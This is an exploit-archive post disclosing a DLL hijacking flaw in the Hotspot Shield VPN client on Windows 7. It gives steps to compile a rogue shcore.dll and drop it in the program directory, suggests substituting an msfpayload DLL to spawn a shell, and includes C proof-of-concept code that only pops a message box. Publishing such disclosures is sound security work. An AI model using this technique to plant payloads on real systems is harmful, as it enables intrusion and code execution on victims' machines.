Home / os / linux

Hotspot Shield DLL Hijacking

Posted on 28 August 2016

# Exploit Title: Hotspot Shield DLL Hijacking Exploit (shcore.dll ) # Date: 27-8-2016 # Author: Amir.ght # Vendor Homepage: https://www.hotspotshield.com/ # Software Link: https://mydati.com/download/hss-win2/HSS-773.exe # Version: # Tested on:Windows 7 ---------------------------------------------------------------------------------------------------------- # 1. gcc malicious_dll.c -o shcore.dll -shared # 2. Put shcore.dll in the same directory of Hotspot Shield program # 3. You can generate a msfpayload DLL and spawn a shell, for example. ---------------------------------------------------------------------------------------------------------- # Exploit: //gcc malicious_dll.dll -o shcore.dll -shared //this dll show a message box #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; }

 

TOP